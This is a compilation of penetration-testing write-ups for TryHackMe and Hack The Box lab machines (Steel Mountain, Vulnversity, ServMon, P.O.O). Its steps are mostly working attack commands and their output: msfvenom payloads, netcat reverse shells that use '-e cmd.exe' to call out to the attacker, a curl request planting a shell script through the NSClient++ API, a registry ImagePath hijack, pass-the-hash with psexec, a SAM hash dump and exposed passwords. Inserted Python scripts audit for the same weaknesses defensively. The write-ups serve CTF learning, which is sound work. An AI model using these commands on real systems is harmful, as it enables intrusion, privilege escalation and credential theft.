[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe


I stopped the service using Service Control.

Now, I uploaded the binary to C:\Program Files (x86)\IObit. Before starting the service, create a netcat listener, then drop into a shell and start the service with Service Control (sc start AdvancedSystemCareService9).

I received the reverse shell. Now, if we want to upgrade our shell, we can use the Metasploit Web Delivery module as follows.

[Image: Web delivery configuration]

I already had it preconfigured; I just changed a few things. Also, don't forget to use the PSH delivery (set target 2). Now, just copy-paste it into the generic shell you spawned earlier and hit enter. You'll receive the connection in Metasploit.

You have upgraded the shell. Now you can run hashdump, pivot if needed and so on.

C:\users\bill\desktop>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
Advanced SystemCare Service 9 AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Auto 
Application Host Helper Service AppHostSvc C:\Windows\system32\svchost.exe -k apphost Auto 
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto 
Base Filtering Engine BFE C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Background Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Cryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k NetworkService Auto 
DCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
DHCP Client Dhcp C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
DNS Client Dnscache C:\Windows\system32\svchost.exe -k NetworkService Auto 
Wired AutoConfig dot3svc C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Manual 
Diagnostic Policy Service DPS C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork Auto 
Windows Event Log EventLog C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted Auto 
COM+ Event System EventSystem C:\Windows\system32\svchost.exe -k LocalService Auto 
Windows Font Cache Service FontCache C:\Windows\system32\svchost.exe -k LocalService Auto 
Group Policy Client gpsvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
IKE and AuthIP IPsec Keying Modules IKEEXT C:\Windows\system32\svchost.exe -k netsvcs Auto 
IObit Uninstaller Service IObitUnSvr C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe Auto 
IP Helper iphlpsvc C:\Windows\System32\svchost.exe -k NetSvcs Auto 
Server LanmanServer C:\Windows\system32\svchost.exe -k netsvcs Auto 
Workstation LanmanWorkstation C:\Windows\System32\svchost.exe -k NetworkService Auto 
LiveUpdate LiveUpdateSvc C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe Auto 
TCP/IP NetBIOS Helper lmhosts C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
Windows Firewall MpsSvc C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Distributed Transaction Coordinator MSDTC C:\Windows\System32\msdtc.exe Auto 
Network Location Awareness NlaSvc C:\Windows\System32\svchost.exe -k NetworkService Auto 
Network Store Interface Service nsi C:\Windows\system32\svchost.exe -k LocalService Auto 
Power Power C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
User Profile Service ProfSvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
Remote Access Auto Connection Manager RasAuto C:\Windows\System32\svchost.exe -k netsvcs Manual 
Remote Registry RemoteRegistry C:\Windows\system32\svchost.exe -k localService Auto 
RPC Endpoint Mapper RpcEptMapper C:\Windows\system32\svchost.exe -k RPCSS Auto 
Remote Procedure Call (RPC) RpcSs C:\Windows\system32\svchost.exe -k rpcss Auto 
Security Accounts Manager SamSs C:\Windows\system32\lsass.exe Auto 
Task Scheduler Schedule C:\Windows\system32\svchost.exe -k netsvcs Auto 
System Event Notification Service SENS C:\Windows\system32\svchost.exe -k netsvcs Auto 
Shell Hardware Detection ShellHWDetection C:\Windows\System32\svchost.exe -k netsvcs Auto 
Print Spooler Spooler C:\Windows\System32\spoolsv.exe Auto 
Software Protection sppsvc C:\Windows\system32\sppsvc.exe Auto 
System Events Broker SystemEventsBroker C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Themes Themes C:\Windows\System32\svchost.exe -k netsvcs Auto 
Distributed Link Tracking Client TrkWks C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted Auto 
User Access Logging Service UALSVC C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Auto 
World Wide Web Publishing Service W3SVC C:\Windows\system32\svchost.exe -k iissvcs Auto 
Windows Connection Manager Wcmsvc C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
WinHTTP Web Proxy Auto-Discovery Service WinHttpAutoProxySvc C:\Windows\system32\svchost.exe -k LocalService Manual 
Windows Management Instrumentation Winmgmt C:\Windows\system32\svchost.exe -k netsvcs Auto 
Windows Remote Management (WS-Management) WinRM C:\Windows\System32\svchost.exe -k NetworkService Auto 
Windows Licensing Monitoring Service WLMS C:\Windows\system32\wlms\wlms.exe Auto

C:\users\bill\desktop>cd C:\Program Files (x86)\IObit\Advanced SystemCare\
cd C:\Program Files (x86)\IObit\Advanced SystemCare\

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:

The service has not been started.


C:\Program Files (x86)\IObit\Advanced SystemCare>^Z
Background channel 3? [y/N] y
meterpreter > upload ascservice.exe
[*] uploading : ascservice.exe -> ascservice.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): ascservice.exe -> ascservice.exe
[*] uploaded : ascservice.exe -> ascservice.exe
meterpreter > shell
Process 3640 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\users\bill\desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of C:\users\bill\desktop

04/16/2020 11:58 PM <DIR> .
04/16/2020 11:58 PM <DIR> ..
04/16/2020 11:58 PM 73,802 ascservice.exe
09/27/2019 05:42 AM 70 user.txt
2 File(s) 73,872 bytes
2 Dir(s) 44,160,622,592 bytes free

C:\users\bill\desktop>copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
Overwrite C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe? (Yes/No/All): A
A
1 file(s) copied.

C:\users\bill\desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
..
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.55.161] 62551
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of c:\Users\Administrator\Desktop

09/27/2019 05:41 AM <DIR> .
09/27/2019 05:41 AM <DIR> ..
09/27/2019 05:41 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 44,262,805,504 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
c:\Users\Administrator\Desktop>

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPEAS, we see that it points us towards unquoted service paths, and it also gives us the name of the service that is affected.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*
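The check winPEAS performs here is easy to reproduce and useful on the defensive side as well. The following script is an added example (not part of this writeup or of winPEAS): it takes (service name, image path) pairs such as `wmic service get name,pathname` or `sc qc` produce, applies the rule Windows uses when an unquoted path contains spaces (every space-delimited prefix is tried, with `.exe` appended, before the real binary), and lists the directories whose write ACLs must be audited. The image path for the IObit service is an assumption for illustration; the svchost entries are taken from the listing above.

```python
"""Audit Windows services for unquoted image paths, the weakness winPEAS flags.

Added example (not part of the original writeup or winPEAS). It models the
rule Windows applies when a service binary path is unquoted and contains
spaces: CreateProcess tries each space-delimited prefix (with .exe appended)
before the real executable, so every parent directory of those candidates
must not be writable by unprivileged users.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple

# Extensions Windows treats as the end of the executable name.
_EXE_RE = re.compile(r"\.(exe|com|bat|cmd)\b", re.IGNORECASE)


@dataclass
class Finding:
    service: str
    image_path: str
    candidates: List[str]     # paths Windows would try, in order
    dirs_to_check: List[str]  # directories whose write ACLs need auditing


def executable_part(image_path: str) -> str:
    """Strip trailing arguments ('-k netsvcs') from an unquoted image path."""
    m = _EXE_RE.search(image_path)
    return image_path[:m.end()] if m else image_path.strip()


def unquoted_candidates(exe: str) -> List[str]:
    """Paths Windows tries for an unquoted executable path containing spaces."""
    cands = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            cands.append(prefix if _EXE_RE.search(prefix) else prefix + ".exe")
    cands.append(exe)
    return cands


def audit_services(services: List[Tuple[str, str]]) -> List[Finding]:
    """services: (ServiceName, ImagePath) pairs, e.g. from
    `wmic service get name,pathname` or `sc qc <name>`."""
    findings = []
    for name, path in services:
        path = path.strip()
        if not path or path.startswith('"'):
            continue                      # quoted: Windows resolves it unambiguously
        exe = executable_part(path)
        if " " not in exe:
            continue                      # no space before the extension: safe
        cands = unquoted_candidates(exe)
        dirs: List[str] = []
        for c in cands:
            d = ntpath.dirname(c)
            if d not in dirs:
                dirs.append(d)
        findings.append(Finding(name, path, cands, dirs))
    return findings


# Constructed sample modelled on the listing above. The IObit image path is an
# assumption for illustration; the svchost/spoolsv entries are from the listing.
SAMPLE_SERVICES = [
    ("Schedule", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    # Hypothetical, correctly quoted third-party service: not reported.
    ("ExampleSvc", r'"C:\Program Files\Example Vendor\examplesvc.exe" -service'),
]

if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        print(f"[!] {f.service}: {f.image_path}")
        for c in f.candidates:
            print(f"    would try: {c}")
        print(f"    audit write ACLs on: {', '.join(f.dirs_to_check)}")
```

The fix on the defending side is the same for every finding: quote the `ImagePath` value (for example with `sc config <name> binPath= "\"C:\Program Files (x86)\...\ASCService.exe\""`) and make sure none of the listed directories grant write or create-file rights to non-administrators.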

#3 Now let’s escalate to Administrator with our newfound knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Author : Puckiestyle

thm-vulnversity-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play TryHackMe’s Vulnversity at https://tryhackme.com/room/vulnversity

Vulnversity

Enumeration

In the room there is a lot of useful information about nmap, so I’m going to run my scan and skip the explaining part.

A lot of open ports.

  • 21 | FTP (vsftpd 3.0.3)
  • 22 | SSH (OpenSSH 7.2p2 ~ Ubuntu version)
  • 139 | Samba (smbd 3.x – 4.x)
  • 445 | Samba (smbd 4.3.11)
  • 3128 | HTTP Proxy (Squid proxy 3.5.12)
  • 3333 | HTTP webserver (Apache 2.4.18)

First 2 services need credentials and the vsftpd version is not the one with the backdoor (too bad LoL). So let’s start with some low hanging fruit.

Webserver

The room gives information about the use of GoBuster. This is an excellent tool to enumerate a webserver, but personally I prefer DirSearch.

When scanning don’t forget to specify the port number, because most tools will try and scan the default port.

Several folders are found, /internal/ is the one we’re after.

The page shows an upload form, which I tested with a jpg file from the internet. No go. I did the same with other popular file types like gif, png and of course php. All were rejected. There is a compilation of very useful wordlists called SecLists. Nowadays it is part of the default wordlists in Kali, but if your Kali or a different OS doesn’t have it, it can be found here. To fuzz the web page I’m going to use BurpSuite. It has a nice feature called Intruder which can do the job for me in an automated fashion.

First I upload a file (it doesn’t really matter which file) and capture the request with the BurpSuite proxy. After you have captured it, send it to Intruder and clear all positions. Then mark only the extension, and don’t forget to include the dot (.), or else you will end up with two dots in the input.

Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be “file%2ephp”, which won’t work. After this you can start the attack.

Every entry results in HTTP code 200, which makes sense as you get a valid response from the server, just not the one you are looking for. So how can you tell which one is different? By the length of the response: it will differ from the others because it won’t contain the error message.

Now we know which extension will pass. Time to upload a file which contains a payload for a reverse shell. A good one to use is from pentestmonkey. The only thing to change after you download it, is the IP address and the port which it needs to connect to.

You can find your current IP address by typing the command ip a

Escalation of Privilege

After we upload the file, we start a listener.

Find the uploaded file.

And click on the file.

And we’re in. Our next move is to see if we have access to the user’s home folder.

Yes we have.

The file user.txt is world readable, so that one is done. Now for the escalation of privilege. For a lot of CTF based challenges a good find are files with the SUID bit set.

I explained this command in an earlier writeup, but in short: I searched for all files with the SUID bit set (perm 4000) and looked at who the owner is. Because of the SUID bit, I can execute the program with the rights of the owner. The file that stands out is one which was created recently (also a good indication).

/bin/systemctl
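Both observations above (an unexpected SUID binary, and one with a much newer timestamp than the rest) can be turned into a routine check. The script below is an added example, not from this writeup: it parses the output of `find / -perm -4000 -type f -printf '%TY-%Tm-%Td %u %p\n'`, compares each path against a baseline of SUID binaries expected on a stock Ubuntu 16.04 install (the baseline is constructed here from memory and should be regenerated from a clean image of your own build), and flags files modified long after the median SUID binary, which is how a hand-added `/bin/systemctl` stands out. The sample listing and its dates are constructed.

```python
"""Audit a SUID-binary listing against a baseline and flag late-modified files.

Added example, not from the original writeup. Input format is what
`find / -perm -4000 -type f -printf '%TY-%Tm-%Td %u %p\n' 2>/dev/null`
produces: modification date, owner, path.
"""
from datetime import date
from typing import Dict, List, Set

# SUID binaries expected on a stock Ubuntu 16.04 install. Constructed from
# memory for this example; regenerate it from a clean image of your own build.
UBUNTU_1604_SUID_BASELINE: Set[str] = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
}


def parse_find_output(text: str) -> List[Dict]:
    """Parse 'YYYY-MM-DD owner /path' lines into records."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        mtime, owner, path = line.split(maxsplit=2)
        records.append({"mtime": date.fromisoformat(mtime), "owner": owner, "path": path})
    return records


def audit_suid(records: List[Dict], baseline: Set[str], gap_days: int = 90) -> List[Dict]:
    """Return records that are outside the baseline, owned by a non-root user,
    or modified more than gap_days after the median SUID binary. Package
    binaries share their install dates, so a lone recent file is the
    'recently created' tell described in the writeup."""
    if not records:
        return []
    median = sorted(r["mtime"] for r in records)[len(records) // 2]
    findings = []
    for r in records:
        reasons = []
        if r["path"] not in baseline:
            reasons.append("not in baseline")
        if (r["mtime"] - median).days > gap_days:
            reasons.append("modified long after other SUID binaries")
        if r["owner"] != "root":
            reasons.append(f"owned by {r['owner']}")
        if reasons:
            findings.append({**r, "reasons": reasons})
    return findings


# Constructed sample: package binaries carry their install dates; /bin/systemctl
# (normally not SUID at all) stands out on both checks.
SAMPLE_FIND_OUTPUT = """\
2016-04-16 root /bin/su
2016-04-16 root /bin/mount
2016-04-16 root /bin/umount
2017-01-24 root /bin/ping
2017-01-24 root /usr/bin/passwd
2017-03-07 root /usr/bin/sudo
2016-04-16 root /usr/lib/openssh/ssh-keysign
2019-11-12 root /bin/systemctl
"""

if __name__ == "__main__":
    for f in audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT), UBUNTU_1604_SUID_BASELINE):
        print(f"[!] {f['path']} ({f['mtime']}, {f['owner']}): {'; '.join(f['reasons'])}")
```

A file-integrity tool such as AIDE gives the same signal continuously; the baseline approach here is what you run when you only have a shell and a `find` listing.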

Systemctl is a controlling interface and inspection tool for the widely-adopted init system and service manager systemd. Systemd in turn is an init system and system manager that is widely becoming the new standard for Linux machines. So what can we do with systemctl?

Systemd initializes user space components that run after the Linux kernel has booted, and keeps maintaining those components throughout a system’s lifecycle. These tasks are known as units, and each unit has a corresponding unit file. We can create our own unit file and let systemd start it. Normally systemctl looks for unit files in the default folder, which is /etc/systemd/system. But we don’t have permission to write to that folder. So how can we create a unit file and let systemctl start it? We use an environment variable.

First we create a variable which holds a unique file name.

Then we create a unit file and write it to the path held in the variable.

Inside the unit file we entered a command which lets the shell execute cat and redirect its output to a file called output in the /tmp folder. Finally we use the SUID /bin/systemctl program to enable the unit file.
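What makes this unit suspicious is visible from the unit file and its location alone, which a defender can check across a fleet. The following added example (not from this writeup) is a minimal systemd unit-file parser plus an audit function: it flags units stored outside the standard unit directories or in a world-writable location, `Exec*` lines that hand a command string to a shell, references to `/tmp`-style directories, and units that run as root without a `User=` line. The sample unit and its `/tmp` path are constructed to mirror the description above.

```python
"""Parse a systemd unit file and flag the pattern described above: a unit
kept in a world-writable directory whose ExecStart runs a shell command that
writes into /tmp, enabled through an absolute path rather than a packaged unit.

Added example, not from the original writeup. The sample unit is constructed
to mirror the description in the text.
"""
import re
from typing import Dict, List, Tuple

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
UNIT_DIRS = ("/etc/systemd/system/", "/run/systemd/system/",
             "/lib/systemd/system/", "/usr/lib/systemd/system/")
SHELL_RE = re.compile(r"(^|/|\s)(sh|bash|dash|zsh)\s+-c\b")


def parse_unit(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Minimal unit-file parser: sections map to ordered (key, value) lists,
    because systemd allows a key (e.g. ExecStart) to repeat. Handles comments
    and backslash continuation lines."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1] + " "
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current].append((key.strip(), value.strip()))
    return sections


def audit_unit(unit_path: str, text: str) -> List[str]:
    """Return human-readable findings for one unit file."""
    findings = []
    if not unit_path.startswith(UNIT_DIRS):
        findings.append(f"unit file outside the standard unit directories: {unit_path}")
    if unit_path.startswith(WORLD_WRITABLE):
        findings.append("unit file lives in a world-writable directory")
    service = parse_unit(text).get("Service", [])
    runs_as_root = not any(k == "User" and v not in ("root", "0") for k, v in service)
    for key, value in service:
        if not key.startswith("Exec"):
            continue
        if SHELL_RE.search(value):
            findings.append(f"{key} runs a shell command: {value}")
        if any(p in value for p in WORLD_WRITABLE):
            findings.append(f"{key} references a world-writable directory")
    if runs_as_root and any(k.startswith("Exec") for k, _ in service):
        findings.append("Exec commands run as root (no non-root User=)")
    return findings


# Constructed sample mirroring the writeup's unit: a oneshot that copies a file
# into /tmp, stored in a mktemp directory under /tmp.
SAMPLE_PATH = "/tmp/tmp.a1b2c3/privesc.service"
SAMPLE_UNIT = """\
[Unit]
Description=example

[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for finding in audit_unit(SAMPLE_PATH, SAMPLE_UNIT):
        print("[!]", finding)
```

On a live system the inputs come from `systemctl list-unit-files --type=service` (the `FragmentPath` property of each unit gives the real path behind any symlink in `/etc/systemd/system/*.wants/`); a SUID bit on `/bin/systemctl` itself should of course be the first thing removed.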

Let’s see if it worked….

There is a file called output.

And there you have it. The output of root.txt

htb-servmon-nl

htb-servmon

As always we start with a nmap scan

 

We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

LFI is https://www.exploit-db.com/exploits/47774


So we have the passwords.

L1k3B1gBut7s@W0rk is the password for user Nadine for service

 

ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk

next we upload nc.exe to box

then
https://www.exploit-db.com/exploits/46802

C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Other way:

Enumerating the current user shows that the “Server Operators” group can read and write system services: it can change the configuration of services that run with SYSTEM permissions and start them. Hence the idea: find a SYSTEM service that has not been started, point its ImagePath at a Trojan or nc, and then start it:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>

Author : Puckiestyle

htb-endgame-poo

Hack the Box – P.O.O ( writeup as of box retired by june 2020 )

As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

